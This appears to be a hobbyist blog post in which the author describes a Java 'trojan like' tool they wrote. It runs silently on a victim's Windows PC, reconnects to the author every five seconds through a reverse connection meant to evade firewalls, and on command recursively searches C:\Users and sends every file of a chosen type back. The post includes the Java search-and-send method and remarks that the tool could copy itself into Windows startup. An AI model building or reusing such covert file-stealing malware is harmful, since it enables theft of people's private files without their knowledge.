Been learning some of the more advanced concepts of Java after getting into games programming and android more than usual. I wrote this scary trojan like tool in java using threads, sockets and recursion. One thread for the socket that handles the messages and one thread to send the files.
This is actually two programs. One for the victim and one that runs on my pc and listens for the connection. When the victim opens it, nothing appears to happen but in the background it will try and connect to me every 5 seconds until I accept the connection. Once connected I simply input what file type I want and it will recursively search every file on the victim and send me the files.
Being that the victim is the one that issues the connection this evades firewalls. Essentially its a reverse connection. Any errors or interruptions on the victim end simply causes it to "restart" and begin looking for connections again. It wont stop until manually ended in task manager. I could have it copy itself to windows startup but for a proof of concept this will do :P
The victim side currently only works on windows as it starts the searches at C:\Users\. I dont really have any plans to update to check for MAC or Linux. The server side that sits at my end will run on MAC, Linux and Windows being Java and all...
Waiting for the victim to open the program.
Once a connection is received.
After choosing jpg it kicks off the search and send method.
This is the magic behind the recursive search. Its just grabbing a list of files and directories from the C:/Users path and then recursively going through each directory filtering out the chosen file type:
private void searchFiles(File startPoint) throws IOException, ClassNotFoundException{
File[] files = startPoint.listFiles();
String fileNames;
if(files == null){
return;
}
for(int i = 0; i < files.length; i++){
if(files[i].isDirectory()){
searchFiles(files[i]);
}else if(files[i].isFile()){
fileNames = files[i].getAbsolutePath();
if(fileNames.endsWith("." + extension) || fileNames.endsWith("." + extension.toUpperCase())){
client.sendCommands(fileNames);
client.sendFile(fileNames);
client.sendCommands("Sent file " + fileNames);
}
}
}
}